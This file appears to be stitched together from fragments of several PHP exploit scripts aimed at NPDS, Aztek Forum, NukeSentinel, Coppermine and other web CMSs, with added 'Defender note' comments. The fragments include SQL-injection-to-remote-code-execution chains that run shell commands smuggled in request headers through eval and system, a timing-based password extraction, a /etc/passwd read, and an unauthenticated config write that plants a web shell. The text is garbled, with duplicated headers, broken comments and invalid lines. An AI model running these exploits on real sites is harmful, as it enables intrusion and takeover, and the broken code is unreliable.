/**
 * Interactive driver of this proof of concept.
 *
 * Reads the target URL and optional proxy settings through get_p(), then loops
 * on cmd_prompt(): each command is placed in a custom `MypCode` request header,
 * a GET is sent to `index.php?fields=...`, and whatever the response carries
 * between two copies of $s_sep is printed. Exits with status 1 when the
 * separator is not found in the response.
 *
 * Defender note: the traffic is recognisable by the non-standard `MypCode`
 * request header and a `fields=` query parameter; parameterised queries on the
 * server side remove the injection point, and logging/rejecting unexpected
 * request headers at the edge makes the command channel visible.
 *
 * phpsploit, head(), get_p(), cmd_prompt(), add_slashes() and to_char() are
 * defined elsewhere in the file.
 */
function main()
{
    // :)
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Hey ya :)
    head();
    // Target — the second argument presumably marks the option as required; confirm in get_p().
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP code
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator — only needs to be unlikely to occur in the page, not unpredictable,
    // so rand() is adequate here.
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess ! — loop ends when cmd_prompt() returns false.
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result — index 1 exists only if the separator appeared at least once.
        $res = explode($s_sep, $web->getcontent());
        // Erf
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            // NOTE(review): empty() also treats the string "0" as empty, so a
            // command whose whole output is "0" is reported as "No output".
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
#!/usr/bin/php
<?php 
// Notices are suppressed, so unset option values simply read as null below.
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
// Usage banner; fewer than three CLI words means no -url <url> pair was given.
if ($argc < 3) {
    print "\n  TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n   NOTE | Works regardless of php settings\n  USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy     If you wanna use a proxy <proxyhost:proxyport> \n        | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
    exit(1);
}
// Target base URL (the second argument presumably marks it as required — see getparam()).
$url = getparam('url', 1);
$pro = getparam('proxy');
// NOTE(review): 'proyauth' does not match the -proxyauth option advertised in the
// usage text, so the proxy credentials given on the command line are likely never read.
$pra = getparam('proyauth');
// HTTP client helper (defined elsewhere in the file).
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
    $xpl->proxy($pro);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125.  settype ($lid, "integer");
# 126.  PrintPage("links",$DB, $lid);
#
# 30.  if ($oper=="links") {
# 31.  $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32.  list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40.  if ($DB) {
# 41.  $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
 +-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums")

 ---[ CODE ./index/common_actions.php
 ------------------------------------
 $file = $_FILES['upload']['tmp_name']; ...
 if(@copy($file,$path_file)) $avatar=$path_file;
 ------------------------------------
 |
 +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
*/
// Positional arguments: target base URL, optional proxy host, optional proxy credentials.
// No $argc check here, so missing arguments produce undefined-index notices unless
// error reporting is lowered earlier in the file.
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
// HTTP client helper (defined elsewhere in the file).
$xpl = new phpsploit();
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
print "\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
// Fingerprint step: the forum owner name is scraped from the href='./index.php?owner=...'
// link in the response. Defender note: a `fid=-1 or 1=1` query string is a textbook
// injection probe and is easy to flag in access logs; parameterised queries on fid
// remove the issue at the source.
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
    print "\nsploit> Owner -> " . $matches[1];
} else {
    // Nothing matched: abort the whole script.
    die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
// Keep cookies and follow redirects for the session-based steps that follow.
$xpl->cookiejar(1);
$xpl->allowredirection(1);
// Usage banner; fewer than three CLI words means no -url <url> pair was given.
if ($argc < 3) {
    print "\n--  NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit  ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url <> [Options]\n Params: -url       For example http://victim.com/phpnuke/ \nOptions: -prefix    Table prefix (default=nuke)\n         -debug     Debug mod activated (debug_ns.html)\n         -truetime  Server response time which returns true\n         -benchmark You can change the value used in benchmark()\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n   Note: This exploit is based on the server response time\n         If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}
// Required target URL (second argument presumably marks it as required — see getparam()).
$url = getparam("url", 1);
// Optional settings; each getparam() call is repeated when the option is present.
// $benchmark stays a string and is used as-is by bruteforce() below.
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
// HTTP client helper (defined elsewhere in the file); no redirects, no cookie jar.
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
// debug() is defined elsewhere; the usage text says it writes debug_ns.html.
if ($debug) {
    debug(1);
}
// NOTE(review): the "******" run between the two string literals looks like a
// redaction artefact from the corpus; as written this line is not valid PHP.
print "\nUsername: "******"\nPassword: ";
// Timing-based extraction (see the usage text); bruteforce() is defined below.
// Defender note: this technique needs many requests to the same endpoint with
// widely varying response times — a rate limit plus slow-query logging makes it
// both noisy and detectable.
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
    global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
/*/
// Positional arguments: target URL, admin user, admin password, optional proxy
// host, optional proxy credentials. There is no $argc check, so missing values
// read as undefined indexes.
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
// HTTP client helper (defined elsewhere); cookies kept and redirects followed.
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}
/*/
 Table prefix.
/*/
// Version fingerprint: the version string is read from include/index.html.
// Defender note: a version banner in a world-readable file is what makes this
// step work; removing or restricting it denies the fingerprint (it does not fix
// the underlying issue).
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
    print "\nsploit> Coppermine version " . $matches[1];
} else {
    // Not fatal: the script continues without a version.
    print "\nsploit> Not found";
}
#!/usr/bin/php
<?php 
// Usage banner; needs at least <url> and <file>.
if ($argc < 3) {
    print "\n --------------------------------------------------------\n Affected.scr..: Simple Web Content Management System\n Poc.ID........: 18070102\n Type..........: SQL Injection\n Risk.level....: Medium\n Src.download..: www.cms-center.com\n Poc.link......: acid-root.new.fr/poc/18070102.txt\n Credits.......: DarkFig\n --------------------------------------------------------\n Usage.........: php xpl.txt <url> <file>\n Options.......: <proxhost:proxport> <proxuser:proxpass>\n Example.......: php xpl.txt http://hihi.org/ /etc/passwd\n --------------------------------------------------------\n";
    exit(1);
}
// Positional arguments. $argv[3] and $argv[4] are optional, and no error_reporting()
// call is visible here, so omitting them emits undefined-index notices.
$url = $argv[1];
$file = $argv[2];
$proxh = $argv[3];
$proxa = $argv[4];
// HTTP client helper (defined elsewhere in the file).
$xpl = new phpsploit();
$xpl->agent("Mozilla");
if ($proxh) {
    $xpl->proxy($proxh);
}
if ($proxa) {
    $xpl->proxyauth($proxa);
}
/*
 * $id = $_GET['id'];
 * $query = "SELECT * from content WHERE id = $id";
 * ...
 * @return $row->text;
 *
 * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
 * What we want is not in the database, it's in a file (config.php):
 *
 * //this are the logins for the admin part. Change them for security.
 * $login = "******";  //your login for the admin section.
 * $pass = "******";   //your login for the admin section.
 *
<?php 
// Notices are suppressed, so absent options simply read as null below.
error_reporting(E_ALL ^ E_NOTICE);
// head() and usage() are defined elsewhere in the file.
head();
if ($argc < 3) {
    usage();
}
// Target base URL (required) and optional proxy settings.
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
// Payload later embedded in the posted configuration data.
$cod = 'eval($_SERVER[HTTP_SHELL]);';
// HTTP client helper (defined elsewhere); redirects followed, cookies kept.
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
// Steps 0x01–0x03: three POSTs to dirsys/modules/auth.php (delete, create, log in).
// Defender note: as the sequence implies, a credential file that can be removed
// and recreated by an unauthenticated POST is the root issue — verify that on the
// target version and require an authenticated, CSRF-protected request for it.
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
// Defender note: configuration values written verbatim into a PHP file are the
// write primitive here; the fix is to escape or validate every value before it
// reaches fwrite (or to store configuration outside executable code).
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
// The interactive loop that follows is outside this excerpt.
print "\n0x05>Now enter your commands";